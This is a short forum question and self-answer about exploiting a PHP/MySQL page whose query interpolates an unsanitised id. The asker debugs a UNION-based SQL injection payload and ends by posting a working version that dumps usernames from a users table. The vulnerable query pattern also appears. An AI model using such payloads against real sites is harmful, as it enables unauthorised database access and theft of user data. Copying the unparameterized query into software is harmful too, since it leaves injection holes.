# Why when i try to insert and 1=1 before limit 0,1 i get sql error?

Tags: php, mysql

I have this code :

```
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
```

and the url will be like :

> site.com/aa/?id=1

so i try to add this value :

> site.com/aa/?id=-1 union select 1,group_concat(username),3 from users AND 1=1

so the query will be like :

```
-1 union select 1,group_concat(username),3 from users  and 1=1 LIMIT 0,1
```

when i try to put the code above , i face the sql error :

> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND 1=1 LIMIT 0,1' at line 1

why is that ? and how can i use the sql-injection without errors ?

Comment: What exactly do you want to fix - the vulnerability?

Comment: Where is the where? Why 1=1? Why use mysql instead of mysqli functions? Why not use prepared statements?

Comment: Can't you spot the error? The query you inject doesn't have the `WHERE` keyword but it attempts to have a `WHERE` condition (and an extra `AND` operator).

Comment: Also, there is no way the statement beginning with ```-1 union``` would ever run. Not even close to valid syntax

Comment: guys , this is exploit the sql-injection , so when i use -1  , is for output the second select , and make the first select is wrong ,

Answer (score 1):

ok thanks all , i found the problem was i add `and 1=1` after `from` so thats false in syntax .and to solve it , i just remove and 1=1 and put my payload like this : 
-1 union select 1,group_concat(username),3 from users
and it works :D .